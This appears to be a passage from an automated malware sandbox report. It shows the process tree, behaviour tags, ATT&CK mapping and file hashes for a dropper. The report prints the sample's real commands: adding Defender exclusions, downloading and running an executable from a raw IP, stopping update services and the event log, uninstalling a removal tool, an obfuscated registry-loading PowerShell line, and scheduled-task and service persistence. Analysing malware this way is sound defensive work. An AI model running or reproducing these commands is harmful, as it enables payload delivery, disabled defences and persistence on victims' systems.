1668 wrote to memory of 4012 1668 gfiKDLgr58thy4d.exe 143 PID 1668 wrote to memory of 4012 1668 gfiKDLgr58thy4d.exe 143 PID 1668 wrote to memory of 4012 1668 gfiKDLgr58thy4d.exe 143 PID 1668 wrote to memory of 4012 1668 gfiKDLgr58thy4d.exe 143 PID 1668 wrote to memory of 4012 1668 gfiKDLgr58thy4d.exe 143 PID 4012 wrote to memory of 620 4012 dialer.exe 5 PID 4012 wrote to memory of 680 4012 dialer.exe 7 PID 4012 wrote to memory of 960 4012 dialer.exe 12 PID 4012 wrote to memory of 380 4012 dialer.exe 13 PID 4012 wrote to memory of 756 4012 dialer.exe 14 PID 3500 wrote to memory of 2744 3500 cmd.exe 152 PID 3500 wrote to memory of 2744 3500 cmd.exe 152 PID 680 wrote to memory of 2768 680 lsass.exe 47 PID 680 wrote to memory of 2768 680 lsass.exe 47 PID 1984 wrote to memory of 4484 1984 cmd.exe 153 PID 1984 wrote to memory of 4484 1984 cmd.exe 153 PID 4012 wrote to memory of 872 4012 dialer.exe 15 PID 4012 wrote to memory of 1096 4012 dialer.exe 17 -
Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
-
Uses Volume Shadow Copy service COM API
The Volume Shadow Copy service is used to manage backups/snapshots.
Processes
-
C:\Windows\system32\winlogon.exewinlogon.exe1⤵PID:620
-
C:\Windows\system32\dwm.exe"dwm.exe"2⤵PID:380
-
-
C:\Windows\System32\dllhost.exeC:\Windows\System32\dllhost.exe /Processid:{afbe217d-a802-4fe9-8f77-5417898b8cd8}2⤵PID:5620
-
-
C:\Windows\SysWOW64\dllhost.exeC:\Windows\SysWOW64\dllhost.exe /Processid:{5b361c4d-9521-4006-9376-e68bfcca09cb}2⤵PID:2468
-
-
C:\Windows\SysWOW64\dllhost.exeC:\Windows\SysWOW64\dllhost.exe /Processid:{5b361c4d-9521-4006-9376-e68bfcca09cb}2⤵PID:6116
-
-
C:\Windows\SysWOW64\dllhost.exeC:\Windows\SysWOW64\dllhost.exe /Processid:{5b361c4d-9521-4006-9376-e68bfcca09cb}2⤵PID:6056
-
-
C:\Windows\system32\lsass.exeC:\Windows\system32\lsass.exe1⤵
- Suspicious use of WriteProcessMemory
PID:680
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k DcomLaunch -p -s LSM1⤵PID:960
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s gpsvc1⤵PID:756
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s lmhosts1⤵PID:872
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s NcbService1⤵PID:1096
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s TimeBrokerSvc1⤵PID:1128
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s EventLog1⤵PID:1160
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s Schedule1⤵PID:1208
-
C:\Windows\system32\taskhostw.exetaskhostw.exe {222A245B-E637-4AE9-A93F-A59CA119A75E}2⤵PID:2860
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.EXEC:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.EXE ".(\"{1}{0}\" -f 'eT','S') (\"6T\"+\"o\") ([tYpE](\"{2}{0}{4}{1}{3}\" -F'e','mBL','refl','y','ctiOn.AsSe') ) ; $Dlr4S = [tyPe](\"{3}{1}{2}{4}{0}\"-F'Ry','oSOfT.W','iN32.R','MICR','eGiST') ; $6TO::(\"{0}{1}\" -f 'L','oad').Invoke( (.(\"{1}{2}{0}\" -f 't-Item','g','e') (\"vARI\"+\"Ab\"+\"lE\"+\":DlR4S\") ).\"VA`luE\"::\"lOc`ALM`AChine\".(\"{2}{1}{0}\" -f 'ey','ubk','OpenS').Invoke((\"{1}{0}\"-f'E','SOFTWAR')).(\"{1}{0}{2}\" -f'u','GetVal','e').Invoke((\"{1}{2}{3}{0}\"-f'ger','dia','lers','ta'))).\"EnT`Ryp`OINt\".\"in`VoKE\"(${n`Ull},${n`ULl})"2⤵PID:4856
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXEC:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE ".(\"{1}{0}\" -f 'eT','S') (\"6T\"+\"o\") ([tYpE](\"{2}{0}{4}{1}{3}\" -F'e','mBL','refl','y','ctiOn.AsSe') ) ; $Dlr4S = [tyPe](\"{3}{1}{2}{4}{0}\"-F'Ry','oSOfT.W','iN32.R','MICR','eGiST') ; $6TO::(\"{0}{1}\" -f 'L','oad').Invoke( (.(\"{1}{2}{0}\" -f 't-Item','g','e') (\"vARI\"+\"Ab\"+\"lE\"+\":DlR4S\") ).\"VA`luE\"::\"lOc`ALM`AChine\".(\"{2}{1}{0}\" -f 'ey','ubk','OpenS').Invoke((\"{1}{0}\"-f'E','SOFTWAR')).(\"{1}{0}{2}\" -f'u','GetVal','e').Invoke((\"{1}{2}{3}{0}\"-f'ger','dia','lers','ta'))).\"EnT`Ryp`OINt\".\"in`VoKE\"(${n`Ull},${n`ULl})"2⤵PID:3068
-
-
C:\Program Files\Cuis\bon\Bara.exe"C:\Program Files\Cuis\bon\Bara.exe"2⤵PID:5136
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force3⤵
- Command and Scripting Interpreter: PowerShell
PID:1716
-
-
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalService -p -s DispBrokerDesktopSvc1⤵PID:1292
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s ProfSvc1⤵PID:1316
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalService -p -s nsi1⤵PID:1324
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s Dhcp1⤵PID:1436
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s UserManager1⤵PID:1444
-
C:\Windows\system32\sihost.exesihost.exe2⤵PID:2644
-
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalService -p -s EventSystem1⤵PID:1564
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k netsvcs -p -s Themes1⤵PID:1580
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k NetworkService -p -s NlaSvc1⤵PID:1660
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s SENS1⤵PID:1700
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s AudioEndpointBuilder1⤵PID:1732
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalService -p -s netprofm1⤵PID:1772
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p1⤵PID:1820
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k appmodel -p -s StateRepository1⤵PID:1932
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k NetworkService -p -s Dnscache1⤵PID:1968
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p1⤵PID:1976
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k netsvcs -p -s ShellHWDetection1⤵PID:2044
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s Winmgmt1⤵PID:1940
-
C:\Windows\System32\spoolsv.exeC:\Windows\System32\spoolsv.exe1⤵PID:2108
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k NetworkService -p -s LanmanWorkstation1⤵PID:2216
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -s RmSvc1⤵PID:2364
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s IKEEXT1⤵PID:2508
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k NetworkServiceNetworkRestricted -p -s PolicyAgent1⤵PID:2516
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k UnistackSvcGroup -s CDPUserSvc1⤵PID:2660
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k NetworkService -p -s CryptSvc1⤵PID:2736
-
C:\Windows\sysmon.exeC:\Windows\sysmon.exe1⤵PID:2768
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s LanmanServer1⤵PID:2796
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s WpnService1⤵PID:2824
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s TrkWks1⤵PID:2832
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s TokenBroker1⤵PID:3004
-
C:\Windows\system32\wbem\unsecapp.exeC:\Windows\system32\wbem\unsecapp.exe -Embedding1⤵PID:2132
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalService -p -s CDPSvc1⤵PID:3340
-
C:\Windows\Explorer.EXEC:\Windows\Explorer.EXE1⤵PID:3432
-
C:\Users\Admin\AppData\Local\Temp\c28e37ce98cb20850ba164913c668995822e38c35c491d5ca0e5ec206148b578N.exe"C:\Users\Admin\AppData\Local\Temp\c28e37ce98cb20850ba164913c668995822e38c35c491d5ca0e5ec206148b578N.exe"2⤵
- Checks computer location settings
- Modifies registry class
- Suspicious use of WriteProcessMemory
PID:4240 -
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Public\sd895CEfer.bat" "3⤵
- Suspicious use of WriteProcessMemory
PID:4912 -
C:\Windows\system32\net.exenet session4⤵
- Suspicious use of WriteProcessMemory
PID:4924 -
C:\Windows\system32\net1.exeC:\Windows\system32\net1 session5⤵PID:1056
-
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -WindowStyle hidden Add-MpPreference -ExclusionPath C:\Users;Add-MpPreference -ExclusionPath $env:ProgramFiles;cd C:\Users\Public\Documents;Invoke-WebRequest 185.148.3.216/5fr5gthkjdg71 -OutFile 5fr5gthkjdg71.exe;./5fr5gthkjdg71.exe;exit4⤵
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:4212 -
C:\Users\Public\Documents\5fr5gthkjdg71.exe"C:\Users\Public\Documents\5fr5gthkjdg71.exe"5⤵
- Checks computer location settings
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:2240 -
C:\Users\Public\Documents\gfiKDLgr58thy4d.exe"C:\Users\Public\Documents\gfiKDLgr58thy4d.exe"6⤵
- Executes dropped EXE
- Drops file in System32 directory
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:1668 -
C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force7⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
PID:4748
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c wusa /uninstall /kb:890830 /quiet /norestart7⤵
- Suspicious use of WriteProcessMemory
PID:3612 -
C:\Windows\system32\wusa.exewusa /uninstall /kb:890830 /quiet /norestart8⤵PID:3172
-
-
-
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe stop UsoSvc7⤵
- Launches sc.exe
PID:1536
-
-
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe stop WaaSMedicSvc7⤵
- Launches sc.exe
PID:4484
-
-
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe stop wuauserv7⤵
- Launches sc.exe
PID:3428
-
-
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe stop bits7⤵
- Launches sc.exe
PID:3364
-
-
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe stop dosvc7⤵
- Launches sc.exe
PID:3540
-
-
C:\Windows\system32\powercfg.exeC:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 07⤵
- Power Settings
PID:4276
-
-
C:\Windows\system32\powercfg.exeC:\Windows\system32\powercfg.exe /x -hibernate-timeout-dc 07⤵
- Power Settings
PID:2692
-
-
C:\Windows\system32\powercfg.exeC:\Windows\system32\powercfg.exe /x -standby-timeout-ac 07⤵
- Power Settings
PID:2436
-
-
C:\Windows\system32\powercfg.exeC:\Windows\system32\powercfg.exe /x -standby-timeout-dc 07⤵
- Power Settings
PID:1952
-
-
C:\Windows\system32\dialer.exeC:\Windows\system32\dialer.exe7⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:4012
-
-
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe delete "WAGDKRVZ"7⤵
- Launches sc.exe
PID:4300
-
-
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe create "WAGDKRVZ" binpath= "C:\ProgramData\mxergolzfguk\kaptsegthwf.exe" start= "auto"7⤵
- Launches sc.exe
PID:4748
-
-
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe stop eventlog7⤵
- Launches sc.exe
PID:4916
-
-
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe start "WAGDKRVZ"7⤵
- Launches sc.exe
PID:4176 -
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV18⤵PID:3736
-
-
-
-
C:\Users\Public\Documents\GR55Qg1hth.exe"C:\Users\Public\Documents\GR55Qg1hth.exe"6⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:4588 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force7⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
PID:968
-
-
C:\Windows\SYSTEM32\cmd.execmd /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\wuauserv" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\bits" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\dosvc" /f7⤵
- Suspicious use of WriteProcessMemory
PID:3500 -
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV18⤵PID:864
-
-
C:\Windows\system32\sc.exesc stop UsoSvc8⤵
- Launches sc.exe
PID:3348
-
-
C:\Windows\system32\sc.exesc stop WaaSMedicSvc8⤵
- Launches sc.exe
PID:3544
-
-
C:\Windows\system32\sc.exesc stop wuauserv8⤵
- Launches sc.exe
PID:2744
-
-
C:\Windows\system32\sc.exesc stop bits8⤵
- Launches sc.exe
PID:3920
-
-
C:\Windows\system32\sc.exesc stop dosvc8⤵
- Launches sc.exe
PID:3172
-
-
C:\Windows\system32\reg.exereg delete "HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc" /f8⤵PID:5520
-
-
C:\Windows\system32\reg.exereg delete "HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc" /f8⤵PID:5664
-
-
C:\Windows\system32\reg.exereg delete "HKLM\SYSTEM\CurrentControlSet\Services\wuauserv" /f8⤵PID:5716
-
-
C:\Windows\system32\reg.exereg delete "HKLM\SYSTEM\CurrentControlSet\Services\bits" /f8⤵PID:5768
-
-
C:\Windows\system32\reg.exereg delete "HKLM\SYSTEM\CurrentControlSet\Services\dosvc" /f8⤵PID:5828
-
-
-
C:\Windows\SYSTEM32\cmd.execmd /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 07⤵
- Power Settings
- Suspicious use of WriteProcessMemory
PID:1984 -
C:\Windows\system32\powercfg.exepowercfg /x -hibernate-timeout-ac 08⤵
- Power Settings
PID:4932
-
-
C:\Windows\system32\powercfg.exepowercfg /x -hibernate-timeout-dc 08⤵
- Power Settings
PID:456
-
-
C:\Windows\system32\powercfg.exepowercfg /x -standby-timeout-ac 08⤵
- Power Settings
PID:4484
-
-
C:\Windows\system32\powercfg.exepowercfg /x -standby-timeout-dc 08⤵
- Power Settings
PID:2380
-
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell <#tkmebyokj#> IF((New-Object Security.Principal.WindowsPrincipal([Security.Principal.WindowsIdentity]::GetCurrent())).IsInRole([Security.Principal.WindowsBuiltInRole]::Administrator)) { IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { "schtasks /create /f /sc onlogon /rl highest /ru 'System' /tn 'Barac' /tr '''C:\Program Files\Cuis\bon\Bara.exe'''" } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Program Files\Cuis\bon\Bara.exe') -Trigger (New-ScheduledTaskTrigger -AtStartup) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'Barac' -User 'System' -RunLevel 'Highest' -Force; } } Else { reg add "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "Barac" /t REG_SZ /f /d 'C:\Program Files\Cuis\bon\Bara.exe' }7⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
PID:2804 -
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV18⤵PID:3396
-
-
-
C:\Windows\system32\dialer.exeC:\Windows\system32\dialer.exe7⤵PID:5972
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell <#byjeowvd#> IF((New-Object Security.Principal.WindowsPrincipal([Security.Principal.WindowsIdentity]::GetCurrent())).IsInRole([Security.Principal.WindowsBuiltInRole]::Administrator)) { schtasks /run /tn "Barac" } Else { "C:\Program Files\Cuis\bon\Bara.exe" }7⤵PID:5980
-
C:\Windows\system32\schtasks.exe"C:\Windows\system32\schtasks.exe" /run /tn Barac8⤵PID:5264
-
-
-
-
C:\Users\Public\Documents\F4R5fd8grr.exe"C:\Users\Public\Documents\F4R5fd8grr.exe"6⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:3692 -
C:\Windows\SYSTEM32\schtasks.exe"schtasks" /create /tn "3dfx Startup" /sc ONLOGON /tr "C:\Users\Public\Documents\F4R5fd8grr.exe" /rl HIGHEST /f7⤵
- Scheduled Task/Job: Scheduled Task
PID:864
-
-
C:\Users\Admin\AppData\Roaming\SubDir\Client.exe"C:\Users\Admin\AppData\Roaming\SubDir\Client.exe"7⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:908 -
C:\Windows\SYSTEM32\schtasks.exe"schtasks" /create /tn "3dfx Startup" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\SubDir\Client.exe" /rl HIGHEST /f8⤵
- Scheduled Task/Job: Scheduled Task
PID:1760
-
-
-
-
-
-
-
C:\Windows\System32\msiexec.exe"C:\Windows\System32\msiexec.exe" /i "C:\Users\Public\setup.msi"3⤵
- Enumerates connected drives
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
PID:1520
-
-
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k ClipboardSvcGroup -p -s cbdhsvc1⤵PID:3564
-
C:\Windows\system32\DllHost.exeC:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}1⤵PID:3740
-
C:\Windows\System32\RuntimeBroker.exeC:\Windows\System32\RuntimeBroker.exe -Embedding1⤵PID:3896
-
C:\Windows\System32\RuntimeBroker.exeC:\Windows\System32\RuntimeBroker.exe -Embedding1⤵PID:3492
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s wlidsvc1⤵PID:4016
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s StorSvc1⤵PID:4844
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalServiceAndNoImpersonation -p -s SSDPSRV1⤵PID:1484
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s WinHttpAutoProxySvc1⤵PID:2716
-
C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe"C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe" /service1⤵PID:1924
-
C:\Windows\system32\SppExtComObj.exeC:\Windows\system32\SppExtComObj.exe -Embedding1⤵PID:4068
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalService -p -s LicenseManager1⤵PID:2820
-
C:\Windows\system32\DllHost.exeC:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}1⤵PID:4896
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s NgcCtnrSvc1⤵PID:568
-
C:\Windows\System32\RuntimeBroker.exeC:\Windows\System32\RuntimeBroker.exe -Embedding1⤵PID:2916
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -p -s PcaSvc1⤵PID:452
-
C:\Windows\system32\msiexec.exeC:\Windows\system32\msiexec.exe /V1⤵
- Enumerates connected drives
- Drops file in Program Files directory
- Drops file in Windows directory
- Modifies data under HKEY_USERS
- Modifies registry class
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:468 -
C:\Windows\system32\srtasks.exeC:\Windows\system32\srtasks.exe ExecuteScopeRestorePoint /WaitForRestorePoint:22⤵
- Suspicious use of AdjustPrivilegeToken
PID:1072
-
-
C:\Windows\system32\vssvc.exeC:\Windows\system32\vssvc.exe1⤵
- Checks SCSI registry key(s)
- Suspicious use of AdjustPrivilegeToken
PID:1480
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k swprv1⤵PID:2548
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s wuauserv1⤵PID:3000
-
C:\Windows\system32\wbem\wmiprvse.exeC:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding1⤵PID:1628
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s DsmSvc1⤵PID:4720
-
C:\Windows\servicing\TrustedInstaller.exeC:\Windows\servicing\TrustedInstaller.exe1⤵PID:1080
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s UsoSvc1⤵PID:2684
-
C:\Windows\System32\mousocoreworker.exeC:\Windows\System32\mousocoreworker.exe -Embedding1⤵PID:4832
-
C:\Windows\system32\DllHost.exeC:\Windows\system32\DllHost.exe /Processid:{AB8902B4-09CA-4BB6-B78D-A8F59079A8D5}1⤵PID:2424
-
C:\ProgramData\mxergolzfguk\kaptsegthwf.exeC:\ProgramData\mxergolzfguk\kaptsegthwf.exe1⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
PID:3476 -
C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force2⤵
- Command and Scripting Interpreter: PowerShell
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
PID:3348 -
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV13⤵PID:4252
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c wusa /uninstall /kb:890830 /quiet /norestart2⤵PID:5600
-
C:\Windows\system32\wusa.exewusa /uninstall /kb:890830 /quiet /norestart3⤵PID:5896
-
-
-
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe stop UsoSvc2⤵
- Launches sc.exe
PID:5588
-
-
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe stop WaaSMedicSvc2⤵
- Launches sc.exe
PID:5884
-
-
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe stop wuauserv2⤵
- Launches sc.exe
PID:520
-
-
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe stop bits2⤵
- Launches sc.exe
PID:2396
-
-
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe stop dosvc2⤵
- Launches sc.exe
PID:3856
-
-
C:\Windows\system32\powercfg.exeC:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 02⤵
- Power Settings
PID:5964
-
-
C:\Windows\system32\powercfg.exeC:\Windows\system32\powercfg.exe /x -hibernate-timeout-dc 02⤵
- Power Settings
PID:5968
-
-
C:\Windows\system32\powercfg.exeC:\Windows\system32\powercfg.exe /x -standby-timeout-ac 02⤵
- Power Settings
PID:388 -
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV13⤵PID:4588
-
-
-
C:\Windows\system32\powercfg.exeC:\Windows\system32\powercfg.exe /x -standby-timeout-dc 02⤵
- Power Settings
PID:1912
-
-
C:\Windows\system32\dialer.exeC:\Windows\system32\dialer.exe2⤵PID:3500
-
-
C:\Windows\system32\dialer.exeC:\Windows\system32\dialer.exe2⤵PID:4536
-
-
C:\Windows\system32\dialer.exedialer.exe2⤵PID:6068
-
Network
MITRE ATT&CK Enterprise v15
Execution
Command and Scripting Interpreter
1PowerShell
1Scheduled Task/Job
1Scheduled Task
1System Services
2Service Execution
2Persistence
Create or Modify System Process
2Windows Service
2Power Settings
1Scheduled Task/Job
1Scheduled Task
1Privilege Escalation
Create or Modify System Process
2Windows Service
2Scheduled Task/Job
1Scheduled Task
1Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
418KB
MD51a61490f49deee9429a7661f28339822
SHA1048395249b1e31b23a7830dc1453a663e0f2913d
SHA256fd27335fb70a07ba1149f0a533978ab170f5459ea0b636e974fd99cf1657cf93
SHA51202609e3dbad30322bef05771f60b4d3575f767f34eaa7312b87f5abcc9e1799f4cd88ea591325529bf9bbb1a61d22dbf698723f82239f681a78a917e6e7fbaac
-
Filesize
3KB
MD55bd2daadcc95d02b313ab408f69c0cdd
SHA167caef81cd36414de21c6da9ee8dddff8de7f543
SHA256fab8db28a3d3b192ed385bbc7e51e4939f694e99cf33fd8aa12f3c0f431baeb1
SHA512a83e5fdf620ddc5973232c9c82a91a176c215e4315546f7b2bb679b9cc44a802c2373428b37e54059a3fedae400b09860cafe00d091789415ed8d39066f627d6
-
Filesize
4KB
MD58faa5b93673b63a8e49cf1bc44e74847
SHA141d3986b4b0e55455bae3c9ed772a72ce8d70edd
SHA256aee0de78527a323a58d2ac4085320c929615a31a016d50aa42103a71d5d58f86
SHA512ad3ae87c11bb1c8d5745877f9b8b5311f8422cad36654e926decb78fd20b5f123ca1c97e233436ada5e3cdb6015c23e03d2fe3324a815dcead289ac06dc9685d
-
Filesize
1KB
MD5667c980f8cd8188a655d021694e2827b
SHA118ff11f478a31c28f3ca0391bb2c881591c473eb
SHA2566ec7238938fc876381377aa8721305599756fc728843468132f2f42ad247593e
SHA512794c476816fb5641d69538f7e802205989f6df4cae2be4c0e67cbc2771e56b488921cd510e775eb65166866e882126f3b69068383c89224e9e5a0ac8322c1dd1
-
Filesize
3KB
MD5427ecb20be96e8ad36285ab3f99868ea
SHA19658bfcff5ecae656f581f7fc425ef043aa8493a
SHA256a2cd4991bfcf6c9d72e359a65ca6bb408ceca577676269bb0fd564a7e0991eee
SHA512a8f3e05ae2afeddbdbee236bf4a88eb76c3b94f09331f9fc61dedc4f48775efa99399c4b8ab8cd4cc76b3da483d389b444716fde383f8e46f35321b0e4b17936
-
Filesize
4KB
MD502d2be951b75bd1d079f14087df679c9
SHA1cc8b581c9156605cc492f2421e9e8475672af70a
SHA256bcfef812de24932c9f401473a2ba720625cd5acb23ceecf35783271db1eb51cd
SHA512bb3dd5009fcd9219db5c554eb36023c33281e6ab7756945bc083b08e7cb3de270475226a20cd95a07b045ceaa8f7abc58f19944f30386aac8e75d91324ee0c79
-
Filesize
3KB
MD5747aa9090eb43a1b464ab98b57ab10e4
SHA1d67ff1b4e2a48194c7f66cdec0610bf75c3c42c0
SHA2567b8259b01e5a4dc853df01a2d4062c64ca61f27583db41bd827fafcf74284727
SHA51247d4a0aa240758be5864b03c27859d17037e1dfb7af99b494086ed248b82250165abedd7ad6a8a88f5503c77c61a72b4d7aef76b62a3a65ffeb1229a113dd071
-
Filesize
3KB
MD5ffd2fa67986045e5b906e6e69d829842
SHA190e90d0e35eb4f4b926205b79a86def2ab189537
